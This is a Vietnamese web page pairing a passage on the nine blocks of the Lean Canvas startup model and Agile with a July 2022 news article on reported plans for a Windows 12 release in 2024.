  1. Problem (vấn đề): đa số các Startup thất bại trong việc “tạo ra đúng sản phẩm” chứ không phải là “tạo ra sản phẩm đúng cách”. Cách doanh nhân khởi nghiệp thường đánh giá sai nhu cầu của khách hàng, vấn đề từ thị trường là nguyên nhân chính dẫn đến thất bại. Do đó hiểu rõ và tìm hiểu các vấn đề là yếu tố đầu tiên của mô hình. Lưu ý: Ở giai đoạn đầu nên giới hạn trong phạm vi 3 vấn đề mấu chốt mà bạn muốn giải quyết cho khách hàng.
  2. Customer Segments (CS- Phân khúc khách hàng): Các nhóm khách hàng chính mà bạn hướng đến là ai?
  3. Unique Value Proposition (UVP – Đề xuất giá trị khác biệt): Những ưu điểm mang tính cạnh tranh của mô hình khởi nghiệp của bạn là gì? Với khách hàng, đâu là lý do quan trọng nhất khiến họ chọn mua sản phẩm của bạn?
  4. Solution (Giải pháp): Các đặc điểm của sản phẩm hoặc dịch vụ giúp khách hàng giải quyết vấn đề của họ. Nên nhớ là bạn không thể giải quyết mọi vấn đề một lúc. Theo Lean Startup thì bạn nên lựa chọn những tính năng có tính hữu dụng tối thiếu trước sau đó dần hoàn thiện nâng cấp để phù hợp với nhưng đối tượng khác nhau đã trong vòng phản hồi cốt lõi của Lean Startup bao gồm Xây dựng – Đo lường – Học hỏi.
  5. Key Metrics (Chỉ số chủ chốt): Startup thường dễ bị nhấm chìm trong núi số liệu để có thể sắp xếp các biến số không chắc chắn đó. Tuy nhiên ở bất kỳ thời điểm nào cũng chỉ có một vài hoạt động chính mang lại giá trị. Vậy nên các doanh nhân khởi nghiệp cần tìm ra và tập trung vào 1 số hành hoạt động chính. Lưu ý rằng điều này cũng có tính rủi ro nếu bạn xác định sai có thể gây ra lãng phí.
  6. Revenue streams (Nguồn thu nhập): Nguồn thu nhập của bạn đến từ đâu?
  7. Cost Structure (Chi phí): Các chi phí mà công ty phải bỏ ra ví dụ như chi phí phân phối, lương, thưởng,v.v.
  8. Channels (Kênh bán hàng): Các cách để tiếp cận khách hàng. Bạn nên liệt kê rõ cách kênh có trả phí và không. Bình thường sẽ có 4 loại kênh chính là: truyền thông, phân phối, bán hàng và chăm sóc khách hàng.
  9. Unfair Advantage (Lợi thế cạnh tranh độc quyền): Đây là phần khó hoàn thiện nhất với các Startup. Nó là những gì bạn có mà đối thủ hoặc người khác khó có thể mua hoặc sao chép được. Đây là yếu tố sống còn của 1 startup bạn nên liên tục dành thời gian suy nghĩ về vấn đề này cà tìm ra những lợi thế cạnh tranh của mình.

Facebook Lean Canvas

Dưới đây là hình ảnh ví dụ cụ thể về mô hình Lean Canvas của Facebook:

Ngày nay, khi thế giới ngày càng biến động và đổi mới không ngừng, việc đòi hỏi những cách làm mới đem lại hiệu quả hơn, linh hoạt hơn để đáp ứng được với nhu cầu thị trường ngày càng được đề cao hơn bao giờ hết. Việc xây dựng một mô hình Lean Canvas sẽ giúp bạn có một cái nhìn tổng quát hơn về một mô hình kinh doanh để kế hợp với các mô hình làm việc khác như Agile để phát triển nó. Agile được du nhập và rất phát triển tại Việt Nam, Agile cho phép các doanh nghiệp linh hoạt hơn, hiệu quả hơn. Một số đối tác nổi bật của Học viện Agile có thể kể tới như Viettel, FPT Software, Techcombank, Colgate, GameLoft, …

19 Jul 2022

Nhiều người còn chưa “lên đời” Windows 11, nhưng Windows 12 có thể sắp ra mắt

Năm ngoái, Microsoft đã thông báo rằng họ sẽ cung cấp bản cập nhật tính năng hàng năm cho Windows 10 và Windows 11, nhưng có vẻ như công ty sẽ phát hành những bản cập nhật lớn một cách “truyền thống” hơn, đó chính là phát hành luôn phiên bản Windows mới.

Theo thông tin từ Windows Central, Microsoft đang quay lại chu kỳ phát hành ba năm cho các phiên bản “chính” của Windows. Nguồn tin của Windows Central cho biết thêm rằng bản phát hành lớn tiếp theo được lên kế hoạch vào năm 2024, có tên mã là Next Valley.

Chúng ta sẽ có Windows 12 vào năm 2024? - Ảnh 1.

Kể từ Windows 10 năm 2015, Microsoft đã rời khỏi chu kỳ ba năm và ưu tiên ý tưởng Windows như một dịch vụ. Nghĩa là thay vì một bản Windows mới với các tính năng lớn, Windows 10 được cập nhật hai lần một năm với các tính năng mới. Windows 10 từng được một nhân viên của Microsoft mô tả là “phiên bản cuối cùng của Windows”.

Tuy nhiên, cuối cùng Microsoft đã phát hành Windows 11 vào năm ngoái và chuyển sang cập nhật hàng năm cho cả Windows 10 và 11.

Với việc Microsoft chuyển sang thương hiệu Windows 11, có khả năng bất kỳ phiên bản cập nhật lớn nào trong tương lai cũng sẽ thay đổi thương hiệu. Cho đến nay, chúng ta vẫn chưa thấy Microsoft áp dụng Windows 11.1 hoặc 11.2 với các bản cập nhật Windows 11 lớn, vì vậy Windows 12 là cái tên đang được mong đợi nhất.

Chúng ta sẽ có Windows 12 vào năm 2024? - Ảnh 2.

Cùng với phiên bản Windows năm 2024 đang được phát triển, Microsoft vẫn giữ kế hoạch cập nhật Windows 11 trong những năm tới. Bản cập nhật lớn tiếp theo, 22H2, hiện dự kiến sẽ phát hành vào tháng 9 hoặc tháng 10.

Microsoft được cho là đã loại bỏ kế hoạch phát hành bản cập nhật thường niên 23H2, thay vào đó sẽ ưu tiên tung ra các tính năng mới trong suốt năm 2023.

Trong cuộc khảo sát mới nhất của AdDuplex vào 6 năm 2022, Windows 11 đang chiếm 23,1% thị phần máy tính. Một con số khá khiêm tốn so với Windows 10.

Nhiều người còn chưa &quot;lên đời&quot; Windows 11, nhưng Windows 12 có thể sắp ra mắt - Ảnh 3.

Microsoft chưa chính thức đưa ra lộ trình phát hành Windows của mình. Công ty đã nỗ lực đổi mới Windows trong hai năm qua, sau khi đại dịch giúp tăng lượng khách hàng sử dụng Windows. Microsoft ban đầu dự định tung ra Windows 10X trên các thiết bị màn hình kép, nhưng sau đó đã chuyển hướng Windows 10X sang Windows 11 mà chúng ta biết ngày nay.

Tham khảo: TheVerge